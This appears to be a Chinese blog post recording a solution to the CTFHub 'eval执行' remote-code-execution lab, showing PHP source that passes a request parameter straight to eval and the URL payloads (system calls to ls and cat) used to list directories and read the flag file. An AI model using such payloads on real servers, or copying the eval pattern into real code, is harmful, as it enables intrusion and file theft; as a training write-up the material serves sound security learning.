CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
QT 小鲜肉6 分钟前
【QT/C++】Qt网络编程进阶:TCP网络编程的基本原理和实际应用(超详细)
c语言·开发语言·网络·c++·qt·学习·tcp/ip
浮游本尊27 分钟前
React 18.x 学习计划 - 第六天:React路由和导航
前端·学习·react.js
yuxb731 小时前
Zabbix企业级分布式监控系统(上)
笔记·学习·zabbix
Chloeis Syntax9 小时前
MySQL初阶学习日记(1)--- 数据库的基本操作
数据库·学习·mysql
musenh10 小时前
css样式学习
css·学习·css3
Larry_Yanan10 小时前
QML学习笔记(五十)QML与C++交互:QML中单例C++对象
开发语言·c++·笔记·qt·学习·ui·交互
im_AMBER10 小时前
算法笔记 09
c语言·数据结构·c++·笔记·学习·算法·排序算法
Nan_Shu_61411 小时前
学习:JavaScript(5)
开发语言·javascript·学习
民乐团扒谱机11 小时前
实验室安全教育与管理平台学习记录(八)特种设备安全
学习·安全
喜欢吃燃面12 小时前
C++:哈希表
开发语言·c++·学习
热门推荐
01GitHub 镜像站点02综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件03UV安装并设置国内源04npm使用国内淘宝镜像的方法05Linux下V2Ray安装配置指南06BongoCat - 跨平台键盘猫动画工具07《大数据技术原理与应用》实验报告三 熟悉HBase常用操作08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09jdk21下载、安装(Windows、Linux、macOS)10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南